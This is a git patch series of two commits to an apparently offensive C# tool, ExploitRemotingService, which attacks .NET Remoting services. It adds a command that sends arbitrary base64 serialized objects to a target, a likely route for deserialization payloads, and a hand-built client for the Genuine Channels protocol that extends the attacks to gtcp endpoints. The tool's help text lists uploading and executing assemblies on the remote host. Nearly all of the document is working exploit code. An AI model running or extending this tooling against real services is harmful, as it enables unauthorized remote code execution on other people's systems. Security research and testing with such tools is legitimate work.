From 6eef8bf46fc75520560ba6295a9809408cc89288 Mon Sep 17 00:00:00 2001 From: Meatballs Date: Fri, 2 Mar 2018 10:06:57 +0000 Subject: [PATCH 1/2] Add option to send raw serialized objects --- ExploitRemotingService/Program.cs | 39 +++++++++++++++++++++++++------ README.md | 1 + 2 files changed, 33 insertions(+), 7 deletions(-) diff --git a/ExploitRemotingService/Program.cs b/ExploitRemotingService/Program.cs index 6ec92ec..cfb6a1f 100644 --- a/ExploitRemotingService/Program.cs +++ b/ExploitRemotingService/Program.cs @@ -234,6 +234,7 @@ static void PrintHelp(OptionSet p) run file [args] : Upload and execute an assembly, calls entry point user : Print the current username ver : Print the OS version +raw base64_object : Send a raw serialized object to the service "); } @@ -677,9 +678,8 @@ private static IRemoteClass CreateRemoteClass() } } - static object SendRequest(object o, bool remote) + static object SendRequest(byte[] data) { - byte[] data = SerializeObject(o, remote); MemoryStream stm = new MemoryStream(); BinaryWriter writer = new BinaryWriter(stm); @@ -712,7 +712,18 @@ static object SendRequest(object o, bool remote) return ParseResult(reader); } - } + } + } + + static object SendRequest(string base64) + { + return SendRequest(Convert.FromBase64String(base64)); + } + + static object SendRequest(object o, bool remote) + { + byte[] data = SerializeObject(o, remote); + return SendRequest(data); } public static T MakeCall(string path, MethodBase mi, params object[] cmdargs) @@ -925,9 +936,23 @@ static int Main(string[] args) Console.WriteLine("Detected version {0} server", _ver); } - IRemoteClass ret = CreateRemoteClass(); + if (_cmd.Equals("raw")) + { + if (_cmdargs.Count != 1) + { + Console.Error.WriteLine("Must specify base64 encoded object"); + } + else + { + Console.WriteLine(SendRequest(_cmdargs.First())); + } + } + else + { + IRemoteClass ret = CreateRemoteClass(); - ExecuteCommand(ret); + ExecuteCommand(ret); + } } catch (Exception ex) { @@ -939,7 +964,7 @@ static int Main(string[] args) else { return 1; - } - } + } + } } } diff --git a/README.md b/README.md index 04a67c9..22fc931 100644 --- a/README.md +++ b/README.md @@ -44,6 +44,7 @@ ls remotedir : List a remote directory run file [args] : Upload and execute an assembly, calls entry point user : Print the current username ver : Print the OS version +raw base64_object : Send a raw serialized object to the service This tool supports exploit both TCP remoting services and local IPC services. To test From af24843e2fceca888e6e41c6f9cdf8ab390ce790 Mon Sep 17 00:00:00 2001 From: Meatballs Date: Fri, 2 Mar 2018 16:38:17 +0000 Subject: [PATCH 2/2] Exploit TcpGenuineChannels too --- ExploitRemotingService/Program.cs | 106 ++++++++++++++++++++++++++++-- 1 file changed, 100 insertions(+), 6 deletions(-) diff --git a/ExploitRemotingService/Program.cs b/ExploitRemotingService/Program.cs index cfb6a1f..c4ee07c 100644 --- a/ExploitRemotingService/Program.cs +++ b/ExploitRemotingService/Program.cs @@ -77,6 +77,7 @@ static void SetupServer() switch (_uri.Scheme) { + case "gtcp": case "tcp": { dict["port"] = _port; @@ -104,7 +105,7 @@ private static Stream BindStream() { Stream ret = null; - if (_uri.Scheme == "tcp") + if (_uri.Scheme == "tcp" || _uri.Scheme == "gtcp") { TcpClient client = new TcpClient(); @@ -676,8 +677,87 @@ private static IRemoteClass CreateRemoteClass() return GetExistingRemoteClass(); } - } - + } + + public static void WriteLabelledStream(MemoryStream inputStream, Stream outputStream) + { + MemoryStream stm = new MemoryStream(); + BinaryWriter writer = new BinaryWriter(stm); + + writer.Write((byte)0x37); // COMMAND_MAGIC_CODE + writer.Write((int)inputStream.Length); + writer.Write((byte)1); // Finished? + writer.Write(inputStream.ToArray()); + + outputStream.Write(stm.ToArray(), 0, (int)stm.Length); + outputStream.Flush(); + } + + static object SendRequestGenuineChannel(byte[] data) + { + using (Stream netStream = BindStream()) + { + MemoryStream stm = new MemoryStream(); + BinaryWriter writer = new BinaryWriter(stm); + + byte genuineConnectionType = 1; + + //LowLevel_OpenConnection() + // MessageCoder.SerializeConnectionHeader() + writer.Write((byte)3); // Protocol Version + writer.Write((byte)genuineConnectionType); + writer.Write("$/__GC/" + _uri.Host); //ConnectionID / ConnectionName + + WriteLabelledStream(stm, netStream); + + stm = new MemoryStream(); + writer = new BinaryWriter(stm); + + //SendConnectionInfo + writer.Write(String.Format("{0}://{1}", _uri.Scheme, Guid.NewGuid())); // LocalUri + writer.Write((int) -1); // Undocumented + writer.Write(genuineConnectionType); + writer.Write((int)2); // LocalHostUniqueIdentifier + + WriteLabelledStream(stm, netStream); + + BinaryReader reader = new BinaryReader(netStream); + reader.ReadByte(); + Int32 length = reader.ReadByte(); + reader.ReadInt32(); + String remoteUri = reader.ReadString(); + Int32 remoteHostUniqueIdentifier = reader.ReadInt32(); + + //LowLevel_StartSending() + stm = new MemoryStream(); + writer = new BinaryWriter(stm); + + writer.Write("D"); // basicSecuritySession + + //MessageCoder.Serialize() + writer.Write((byte)0); //Compression + writer.Write((byte)1); //GenuineMessageType 1 + writer.Write(2); // MessageID + writer.Write(0); // ReplyToId + writer.Write((bool)false); // Is OneWay + writer.Write((bool)false); // MarshalByRef + writer.Write((Int16)0); // SecuritySessionParameters.Attributes + writer.Write(String.Empty); // RemoteTransportUser + + // Write ITransportHeaders + writer.Write("__RequestUri"); + writer.Write(_uri.PathAndQuery); + writer.Write("Content-Type"); + writer.Write("application/octet-stream"); + writer.Write("__"); // headers end tag + writer.Write(data); + + WriteLabelledStream(stm, netStream); + } + + return null; + } + static object SendRequest(byte[] data) { MemoryStream stm = new MemoryStream(); @@ -717,13 +797,27 @@ static object SendRequest(byte[] data) static object SendRequest(string base64) { - return SendRequest(Convert.FromBase64String(base64)); + if (_uri.Scheme.Equals("gtcp")) + { + return SendRequestGenuineChannel(Convert.FromBase64String(base64)); + } + else + { + return SendRequest(Convert.FromBase64String(base64)); + } } static object SendRequest(object o, bool remote) { - byte[] data = SerializeObject(o, remote); - return SendRequest(data); + byte[] data = SerializeObject(o, remote); + if (_uri.Scheme.Equals("gtcp")) + { + return SendRequestGenuineChannel(data); + } + else + { + return SendRequest(data); + } } public static T MakeCall(string path, MethodBase mi, params object[] cmdargs)